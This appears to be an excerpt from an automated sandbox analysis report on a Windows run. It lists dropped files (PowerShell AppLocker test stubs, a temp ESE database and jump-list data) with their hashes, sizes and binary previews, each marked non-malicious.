                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpblppuq.me1.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofed4421.la5.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okds5wqa.ls0.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5sq0hqy.5t1.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qf2dwqtk.4qt.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkc3pine.ajb.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rx4eudy2.xlg.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_to332dyb.g1m.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_toy2s0pu.fv4.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ublatxrb.uvt.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgqtfn4b.uvu.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\bhv4B4.tmp

                                                                                                Download File
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6da2561b, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):20447232
                                                                                                Entropy (8bit):1.2827249890477794
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:UZSwFSo74KaOfvUDF2j+qW5cLvF5HVwXWF:2S1NDS+
                                                                                                MD5:69F8EC5752113AB15524AC7E543C7C2C
                                                                                                SHA1:3083075A45A1604212EF50E31EC2D0BD984C377F
                                                                                                SHA-256:79164957B2A958D6B595B3D68F6983D87B03E3B6ECB5C384780EC28A56ABBD4C
                                                                                                SHA-512:F92A908AA7CCC7A1FF2B089A895EC903080377C8EAD8A286AD523A8B8221CFA4764A179FE2CA9EB7D3E8CC7DA7F06032F969442840526FED7B652DC9DF207558
                                                                                                Malicious:false
                                                                                                Preview:m.V.... ........=......J}...0...{........................"..........{K......{C.h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;.........................................{c...................b......{C..........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf

                                                                                                Download File
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):2
                                                                                                Entropy (8bit):1.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Qn:Qn
                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                Malicious:false
                                                                                                Preview:..

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3IW5OZXGDY3NXEI39FD5.temp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$.....I9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY%"..Roaming.@......CW.^VY%"..........................f...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3PU3L4BZ4AWSD36U3C1A.temp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.72990466722989
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:IeF/2VJ43CMvcGkvhkvCCty14lTeHp14lTeH8:zeJyUSyeeeR
                                                                                                MD5:C30EE93FB44F2E9CB000750759B229D6
                                                                                                SHA1:802F01EC56F2393CDE58F12FA4EF989E141FBF66
                                                                                                SHA-256:60F20FD4F52A6BA5044236DD45F9F7E400BA710CF9657F1639DBFD5D5BEBEC9B
                                                                                                SHA-512:330BB969FF72B93B298375D5593397E938BF39DE07C8A9742716E32C7F643E99D4313D37FC01C25D867349EE5E2785FD3DB73A0830B8E91FEAA7ED59B709A217
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....v.K9$..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$...VV9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY/"..Roaming.@......CW.^VY/"..........................i`(.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^VY+"..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^VY+"....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^VY+"....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^VY+"..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^VY,"....Q...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$.....I9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY%"..Roaming.@......CW.^VY%"..........................f...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF51e45b.TMP (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$.....I9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY%"..Roaming.@......CW.^VY%"..........................f...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF52061b.TMP (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$.....I9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY%"..Roaming.@......CW.^VY%"..........................f...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF522849.TMP (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$.....I9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY%"..Roaming.@......CW.^VY%"..........................f...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5248d1.TMP (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
                                                                                                SHA-256:AEC1335E2B9FA6608C668C1B98A6FB512CDCC3FF797E05A050CF4090182615F7
                                                                                                SHA-512:E26D31783A9475F75E37CCB273642977A223CCE7BAAB266AD6A4899B8D7ED0EE3ABA774EAD1BA72D8D94479649BB1D5A1AC8C2AEB35862A3C1F51AFC3F72E1A8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....h.89$.....I9$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY."...........................%..A.p.p.D.a.t.a...B.V.1.....VY%"..Roaming.@......CW.^VY%"..........................f...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^VY "..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HM2VBND1UF4SDW4A67CK.temp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7296298967758137
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:I6F/2VJ43CMvcGkvhkvCCty14lTeHp14lTeH8:zeJyUSyeeeR
                                                                                                MD5:D9F3CADFF0EA70898F92A28D99AE4541
                                                                                                SHA1:9F2945974FF14101AA852E5F0AB4FB10D7792719
                                                                                                SHA-256:18DD10C4EF97793ECAA6CF972E1B879DCC38D4CEF09301195C4DA1F41F46CB1F
